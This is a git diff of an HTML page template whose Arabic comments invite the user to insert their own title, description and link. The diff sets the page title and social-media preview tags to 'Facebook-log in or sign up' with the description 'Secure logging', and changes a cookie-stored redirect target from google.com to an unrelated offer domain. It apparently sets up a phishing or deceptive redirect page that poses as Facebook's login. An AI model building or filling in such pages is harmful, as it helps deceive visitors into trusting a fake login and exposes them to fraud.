--- a/index.html
+++ b/index.html
@@ -13,16 +13,16 @@
 
 
   <!-- ضع العنوان الخاص بك هنا  -->
-  <title> غير هذا النص </title> 
-  <meta name="title" content="غير هذا النص">
-  <meta property="twitter:title" content="غير هذا النص"> 
-  <meta property="og:title" content="غير هذا النص">
+  <title> Facebook-log in or sign up </title> 
+  <meta name="title" content="Facebook-log in or sign up">
+  <meta property="twitter:title" content="Facebook-log in or sign up"> 
+  <meta property="og:title" content="Facebook-log in or sign up">
 
 
   <!-- ضع الوصف الخاص بك هنا  -->
-  <meta name="description" content="غير هذا النص">
-  <meta property="og:description" content="غير هذا النص">
-  <meta property="twitter:description" content="غير هذا النص">
+  <meta name="description" content="Secure logging">
+  <meta property="og:description" content="Secure logging">
+  <meta property="twitter:description" content="Secure logging">
 
   <!-- ضع الرابط المرفوع عليه الموقع -->
   <meta property="og:url" content="ضع الرابط كامل">
@@ -43,7 +43,7 @@
 
   <script>
 
-    const URL = "https://www.google.com"; // أدخل الرابط الخاص بك هنا 
+    const URL = "https://www.offeranywhere.online/"; // أدخل الرابط الخاص بك هنا 
 
     document.cookie = `rURL=${URL}`;
 
